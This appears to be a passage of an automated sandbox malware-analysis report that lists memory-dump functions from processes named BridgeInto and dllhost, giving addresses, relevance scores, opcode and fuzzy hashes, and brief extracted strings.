                                      • Instruction Fuzzy Hash: FDD012345668098FC650EB28D9D5494BA90FB0A214B8901D0D40CC7161E35A9894D701
                                      Function 00007FFD346606A5 Relevance: .0, Instructions: 13COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d18e80f510b7454b457dd04e8256d1bc12cc23cb8ed179144c3c259b6b8a5607
                                      • Instruction ID: 50fc309d7be4ce434981161fbdfa8ee0cd7a09ae06c083863559a47766ec0d02
                                      • Opcode Fuzzy Hash: d18e80f510b7454b457dd04e8256d1bc12cc23cb8ed179144c3c259b6b8a5607
                                      • Instruction Fuzzy Hash: 3BC04C05F5ED7B41B815BD6E58E60ECA2415BD7631FD51172D70CD00C5DD8D20D52156
                                      Function 00007FFD346612B8 Relevance: .0, Instructions: 12COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                      • Instruction ID: b395b07e5ed02f210e8e693a1abc5eeb5c622c5f434b05e4c49dcc7ab2ed59d8
                                      • Opcode Fuzzy Hash: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                      • Instruction Fuzzy Hash: 50C04C346518098FCA48EB2DC99595477A0FB1A215BD50094E40DC7171D65DDCD5D741
                                      Function 00007FFD34663416 Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 45e327abe6a0e59757ab64633184815f1f2d35acad5b11e610c41844b3aa63f9
                                      • Instruction ID: 52ce8d3283b9bac8dde07918506c0bfa65f743604c2b98eb797db4f2bf450c90
                                      • Opcode Fuzzy Hash: 45e327abe6a0e59757ab64633184815f1f2d35acad5b11e610c41844b3aa63f9
                                      • Instruction Fuzzy Hash: 5DC08C01F0892642F225628480322BE04469F40318F400030E40ED23C6CC0C9F1112C2
                                      Function 00007FFD346606C8 Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                      • Instruction ID: b7b7eb7ee10760aa94a27eabb68364106a4525844e3e5f353e138b94af21ae32
                                      • Opcode Fuzzy Hash: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                      • Instruction Fuzzy Hash: 2BB01204F6683F01A8083D7A08D20E470405B46120FC01170D60CC0085D88D10942242
                                      Function 00007FFD34663A81 Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                      • Instruction ID: c29935bae90b7e96047902e2023dc21d80b537bc4536af27421fdb2bb27774a5
                                      • Opcode Fuzzy Hash: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                      • Instruction Fuzzy Hash: 39C02B10F0C02480E725893044501FD31401F5A310F054171C04ED2081CF3C18003140

                                      Non-executed Functions

                                      Function 00007FFD34698305 Relevance: 5.3, Strings: 4, Instructions: 293COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: K_^$K_^$K_^$^
                                      • API String ID: 0-4024678726
                                      • Opcode ID: f1ed84a6183dce551fec4dcc74f38ba7c0f3a602e01074a89cc037049dc6aaf2
                                      • Instruction ID: 48eda8cfe7ac535d4b579bb8668657dc570aa54117e5a595c831e8d652c4446f
                                      • Opcode Fuzzy Hash: f1ed84a6183dce551fec4dcc74f38ba7c0f3a602e01074a89cc037049dc6aaf2
                                      • Instruction Fuzzy Hash: 4A419363A1E6E20FE7575A795CB50E9AFA0EF6322470C11FBC1D4CB093E94C780A9352
                                      Function 00007FFD346609B0 Relevance: 5.2, Strings: 4, Instructions: 194COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: c9$!k9$"s9$#{9
                                      • API String ID: 0-1692736845
                                      • Opcode ID: 9f2e64bf36a39c19fe3cea799ef3ffe929734340d48cb4f446d7f1047f3c4917
                                      • Instruction ID: 836afbb4862616b3cbf403127ac25d4bef448b44617d2dc931181eb1fa10088c
                                      • Opcode Fuzzy Hash: 9f2e64bf36a39c19fe3cea799ef3ffe929734340d48cb4f446d7f1047f3c4917
                                      • Instruction Fuzzy Hash: 29518F0BB9CA6355E22136FDB0615FF6B88DFE537EB084677E18CD90838D0C648586E5

                                      Executed Functions

                                      Function 00007FFD34650D4C Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.2545906855.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffd34650000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 5\_H
                                      • API String ID: 0-3325266018
                                      • Opcode ID: 3c03b62b83334ae80c3d79e04d8fcbe4d109192c1410a3d77e58408b7a696bbd
                                      • Instruction ID: db2a195ac998038748a1544e386b0003189b695de5eaec710839c92e01539176
                                      • Opcode Fuzzy Hash: 3c03b62b83334ae80c3d79e04d8fcbe4d109192c1410a3d77e58408b7a696bbd
                                      • Instruction Fuzzy Hash: 0291D375A0CB998FE795EB5CC8697AA7BE1FBA6314F4001AAD04AD72D2CF7824118700
                                      Function 00007FFD34650E43 Relevance: .2, Instructions: 172COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.2545906855.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffd34650000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fb6c766aba5db0eae374d81e60fc9289895925166d8e7f7550e7272bb3134843
                                      • Instruction ID: 621e1b153117232a780083c863192e66c1d8e6d83cc6acf58a617455555ba161
                                      • Opcode Fuzzy Hash: fb6c766aba5db0eae374d81e60fc9289895925166d8e7f7550e7272bb3134843
                                      • Instruction Fuzzy Hash: 4F51D3B1A18A598EE794EF5CC8A97AA7BE1FBA6314F50017ED00ED77D1CFB924518300
                                      Function 00007FFD346508D0 Relevance: .2, Instructions: 172COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.2545906855.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffd34650000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 84f1ffc7bc9cb835c232928bcd485bb8066f385fb8b1f1abcd0acd6f038bfc49
                                      • Instruction ID: 341fea4ba59ab6f633088981b80fc1841128f6feebf3f43a841dd12cd548714b
                                      • Opcode Fuzzy Hash: 84f1ffc7bc9cb835c232928bcd485bb8066f385fb8b1f1abcd0acd6f038bfc49
                                      • Instruction Fuzzy Hash: 13410F3270CA644FD724EBACE4A99FE3BD4EF9632570405BBD1C9CB067DD14A8818781
                                      Function 00007FFD3465090D Relevance: .2, Instructions: 150COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.2545906855.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffd34650000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b9600366cae61072ba8b42f4868691210549c05ba31cbed6c72313304102cf06
                                      • Instruction ID: c78d20cc43cd9bc694cc0ea0a18a16efd388b0312f00618d8b6f27b4a3051b6c
                                      • Opcode Fuzzy Hash: b9600366cae61072ba8b42f4868691210549c05ba31cbed6c72313304102cf06
                                      • Instruction Fuzzy Hash: 66412812B0D6650EE714B6F8A4AA5FE7B91DF96325B0444FBD18ECB193CD1CA8818284
                                      Function 00007FFD34650998 Relevance: .1, Instructions: 144COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.2545906855.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffd34650000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 24c649189a132a691ea21866b471441c48a67339ef0695b02fb793b549a41a22
                                      • Instruction ID: 2a42eacbaba064c4f73b480de43c58b0c0121e2b6cfa396d60708289b9a8ed78
                                      • Opcode Fuzzy Hash: 24c649189a132a691ea21866b471441c48a67339ef0695b02fb793b549a41a22
                                      • Instruction Fuzzy Hash: 43412A20B1DA594FE798FB7888AA6B577D2EF96315B0400FDE50EC32D3DD2CA8418345
                                      Function 00007FFD34650908 Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.2545906855.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffd34650000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b3368c1844a52ee59a3a97208f294735a0dec08c23f3eb80fd00a53f5a0f1fa5
                                      • Instruction ID: 578cdeb5bf351ec6ea65c9d9735e739f25c83201ab0c6b9c5869ddbd5fca6167
                                      • Opcode Fuzzy Hash: b3368c1844a52ee59a3a97208f294735a0dec08c23f3eb80fd00a53f5a0f1fa5
                                      • Instruction Fuzzy Hash: 3D21F83130CC184FEB68EF0CE889DB973D1EB5A32130101BAE58EC7125E911EC8287C1
                                      Function 00007FFD34650960 Relevance: .1, Instructions: 116COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.2545906855.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffd34650000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 706558a18d7d2a882d97588186a285f3c3cfb1b369495d0b59d52f60ebcbd123
                                      • Instruction ID: 683a1bbef548717ab20e8a65a4624183b8fb789cd5986e4437d2314248cdfa28
                                      • Opcode Fuzzy Hash: 706558a18d7d2a882d97588186a285f3c3cfb1b369495d0b59d52f60ebcbd123
                                      • Instruction Fuzzy Hash: C0313721B0DA651EF764B6B8A8AA1FA77C1DF96325B0400FED10EC71D3CC1CA8424284
                                      Function 00007FFD3465116D Relevance: .1, Instructions: 107COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.2545906855.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffd34650000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d14c67e8ff5f2a43ea417eb089d935ced852499e9b61570b9f96ee877df0908b
                                      • Instruction ID: e50cb726baea26106b226055c9755c51069578c9a080cc774c80d6e54862c65b
                                      • Opcode Fuzzy Hash: d14c67e8ff5f2a43ea417eb089d935ced852499e9b61570b9f96ee877df0908b
                                      • Instruction Fuzzy Hash: 4A319231E0D65A8FEF55EB68C8A59E97BE0FF5B310B0401FAC00AD7293DA2DA941C740
                                      Function 00007FFD34650C25 Relevance: .1, Instructions: 95COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.2545906855.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffd34650000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 39d06d1bbdd84c8c7ec81f6e22bbad550f2a44e23ca47413fe6572cb5ed3aeee
                                      • Instruction ID: de5c502b91058cdcec6180ce782d4bae802126e6f989451dae17a0aa991b485c
                                      • Opcode Fuzzy Hash: 39d06d1bbdd84c8c7ec81f6e22bbad550f2a44e23ca47413fe6572cb5ed3aeee
                                      • Instruction Fuzzy Hash: B1314775B0DA598EF711ABA8D8A11ED3BB0DF43324F0441F6D148DA1C3D93CA5469781
                                      Function 00007FFD346569E3 Relevance: .1, Instructions: 68COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.2545906855.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffd34650000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1ecb1660522e1e48b479245ad68714db8508a33f8d55b39c1f57df26b1c75aa4
                                      • Instruction ID: 7709d555e85409f95a76570035197d8977393467f61ac1dd518886b9ccd80257
                                      • Opcode Fuzzy Hash: 1ecb1660522e1e48b479245ad68714db8508a33f8d55b39c1f57df26b1c75aa4
                                      • Instruction Fuzzy Hash: 5221FC30E185698FDB65DF04C4A4BE9B3E1FB58314F1085EAC50EE32A5CB79AE85DB40
                                      Function 00007FFD34650C38 Relevance: .1, Instructions: 56COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.2545906855.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffd34650000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 71e13b38691782e4af1a388a2be3b7ae1131b5b533d416d2e74c47193427cf9b
                                      • Instruction ID: a9b830e3104117634d55191356fd2c73ae4048080161e2671d17f9103a73d598
                                      • Opcode Fuzzy Hash: 71e13b38691782e4af1a388a2be3b7ae1131b5b533d416d2e74c47193427cf9b
                                      • Instruction Fuzzy Hash: 95110E75A0DB999FE712DF68C8A10ED7BB4EF43310F0440F6C144EB282D93CA60AA780
                                      Function 00007FFD34650C40 Relevance: .0, Instructions: 50COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.2545906855.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffd34650000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5f7a4ea737788c79f2ed96a8523fcec7e6f97a3aee04c42782812c35ada573e6
                                      • Instruction ID: 653ffe0f42b024a97bdb158d39f13c88a2a3800d9baa9482e6b9349417beef37
                                      • Opcode Fuzzy Hash: 5f7a4ea737788c79f2ed96a8523fcec7e6f97a3aee04c42782812c35ada573e6
                                      • Instruction Fuzzy Hash: 36110435A0DB899FE712DF68C8A10DD7BB0EF43310F0441F6C144DB182D93CA6069781
                                      Function 00007FFD34650C48 Relevance: .0, Instructions: 44COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.2545906855.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffd34650000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b534d37fbf194ce30f0e14638c246d5b219be11df289b40e7254cf3aa625b9be
                                      • Instruction ID: 85be1694b18b85f5f31dc2cb9aeab03c651e450c69e4ffe1c7ebd1f99d40af0e
                                      • Opcode Fuzzy Hash: b534d37fbf194ce30f0e14638c246d5b219be11df289b40e7254cf3aa625b9be
                                      • Instruction Fuzzy Hash: EE019E35A0D7899FE712DF68C8A11DD7FB0EF43310F1441E6D544DB292DA3CAA45A781
                                      Function 00007FFD34650B9A Relevance: .0, Instructions: 15COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.2545906855.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffd34650000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                      • Instruction ID: 94d4e0d0a5778d53ddb45fbbd0fb1cc170f35d6fc0e3f9221d621b3f03aaf751
                                      • Opcode Fuzzy Hash: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                      • Instruction Fuzzy Hash: 5FD012345668098FCA50FB38D9D5494BA90FB0A214B8901D0E40CC7161D35A9894C701
                                      Function 00007FFD346506A5 Relevance: .0, Instructions: 13COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.2545906855.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffd34650000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d18e80f510b7454b457dd04e8256d1bc12cc23cb8ed179144c3c259b6b8a5607
                                      • Instruction ID: c9619c1037cc080ef37d3b78f2fc04bc5c7d845ec2e8e7650dfa2bb67f5c4fe0
                                      • Opcode Fuzzy Hash: d18e80f510b7454b457dd04e8256d1bc12cc23cb8ed179144c3c259b6b8a5607
                                      • Instruction Fuzzy Hash: 61C04C05F5AD3B41F8157D6E58E60EDA2406FD7611FD511F2D70CD00C59C4D60D52156
                                      Function 00007FFD346512B8 Relevance: .0, Instructions: 12COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.2545906855.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffd34650000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                      • Instruction ID: 1cabd04bb9f2c6c37d5bd5dfca529bba394b2c22cdaf88b7e598458a433acb2b
                                      • Opcode Fuzzy Hash: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                      • Instruction Fuzzy Hash: C1C04C345518098FCA48EB29C99595477A0FB1A215BD500D0E409C7171D659DCD5D741
                                      Function 00007FFD34653416 Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.2545906855.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffd34650000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 11db8d34bf2b1fd722dd7b83d5c9a705c832e0becd03c7935d63b290b709960a
                                      • Instruction ID: d530984bcd353ac3577cc2f2975d12cd25a539848b3e8af377d361e85c3312e9
                                      • Opcode Fuzzy Hash: 11db8d34bf2b1fd722dd7b83d5c9a705c832e0becd03c7935d63b290b709960a
                                      • Instruction Fuzzy Hash: 37C04C01F1896A46F665629884312BF04869F9475DF540074E40ED63C6DD5C5F5112C6
                                      Function 00007FFD346506C8 Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.2545906855.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffd34650000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                      • Instruction ID: ed1752b33e058eef08376f977e0a5551ea3d180bb22b7cf6b62f0dc06838db91
                                      • Opcode Fuzzy Hash: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                      • Instruction Fuzzy Hash: 0FB01204F5682F00A804397A08D20E470405F46100FC010F0D60CC0089984D10942242
                                      Function 00007FFD34653A81 Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.2545906855.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffd34650000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                      • Instruction ID: c5f478d45cf30f4fb9b287f29a886fb63abd18870a6ef7b8caa1380ed93f2a1c
                                      • Opcode Fuzzy Hash: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                      • Instruction Fuzzy Hash: 6CC09B11F1D52581E725993044551FD71555F5B305F4545F1C14ED6081DE3C59056541

                                      Non-executed Functions

                                      Function 00007FFD346509B0 Relevance: 5.2, Strings: 4, Instructions: 194COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.2545906855.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffd34650000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: c9$!k9$"s9$#{9
                                      • API String ID: 0-1692736845
                                      • Opcode ID: 49fc8331bf86f988074794240a205ac68c6b60bcf89d321a5fe6b4ea448a80fd
                                      • Instruction ID: 479a50523932dc96f6d6057da81ca01bbae0e0312ab20ca83c92a8676e286f1b
                                      • Opcode Fuzzy Hash: 49fc8331bf86f988074794240a205ac68c6b60bcf89d321a5fe6b4ea448a80fd
                                      • Instruction Fuzzy Hash: 2C518257B8C67259E22176FDB4615FF2B8CDFE533EB0846B7E18CD90938C08608586E5

                                      Executed Functions

                                      Function 00007FFD346C1968 Relevance: 1.8, Strings: 1, Instructions: 599COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD346C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd346c1000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: pw4
                                      • API String ID: 0-3644445799
                                      • Opcode ID: b5295e0886214739ed980f78c1f6ec3822dcbc41c4b9b6d778c604eb56e1d9b3
                                      • Instruction ID: 7444440f62170472b69b79a15d175c81fed42d0f7b9760c636611d016a3b78b8
                                      • Opcode Fuzzy Hash: b5295e0886214739ed980f78c1f6ec3822dcbc41c4b9b6d778c604eb56e1d9b3
                                      • Instruction Fuzzy Hash: 81027861B1C66A0BE31DAE2849911F577D2EB93305F18827ED9DBC7187ED2CAC078680
                                      Function 00007FFD34690D4C Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd34690000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 5X_H
                                      • API String ID: 0-3241812158
                                      • Opcode ID: 5856a747c16f1087290eb193ff229e2435ded77ecebebfcd2fbe06f492eb3dac
                                      • Instruction ID: a1def29ac2eccc01497b7c43d4d664b001cbbcdc270353d1d09b893c922b6fc1
                                      • Opcode Fuzzy Hash: 5856a747c16f1087290eb193ff229e2435ded77ecebebfcd2fbe06f492eb3dac
                                      • Instruction Fuzzy Hash: 6A91E375A18B998FEB95DF58C8657E97FE1FF66304F0400BAC049D73E6DAB914018740
                                      Function 00007FFD34690E43 Relevance: .2, Instructions: 170COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd34690000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 94146e6967ceeb840d7f4f22c563eac742968a10057969d704856df85c6a3ec4
                                      • Instruction ID: 0d04c41cd6c5a25a0c86ed2f75ba45998cc4a1175bf685a39c9c368856ae6f61
                                      • Opcode Fuzzy Hash: 94146e6967ceeb840d7f4f22c563eac742968a10057969d704856df85c6a3ec4
                                      • Instruction Fuzzy Hash: 6351F175A18A998EE798DF5CC8A5BE87FE1FB96314F44016EC009E33D5DBB914118700
                                      Function 00007FFD346CB229 Relevance: 2.6, Strings: 2, Instructions: 60COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD346C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd346c1000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (yy4$I
                                      • API String ID: 0-1698832014
                                      • Opcode ID: 8c2ab04358ec94bc4aec4c1f71fbda58196933e628db2a2acc635f72e9aba907
                                      • Instruction ID: ea2a02f7895bfa77d67632d3e54c0195560251d602c32253a7e8b549a0baa1c5
                                      • Opcode Fuzzy Hash: 8c2ab04358ec94bc4aec4c1f71fbda58196933e628db2a2acc635f72e9aba907
                                      • Instruction Fuzzy Hash: 5111947194E3D84FDB56AF7498A54E97FB0DF57201B4A00FBD189CB1A3D92C5849C701
                                      Function 00007FFD346C3C25 Relevance: 1.5, Strings: 1, Instructions: 285COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD346C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd346c1000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @aW4
                                      • API String ID: 0-655038736
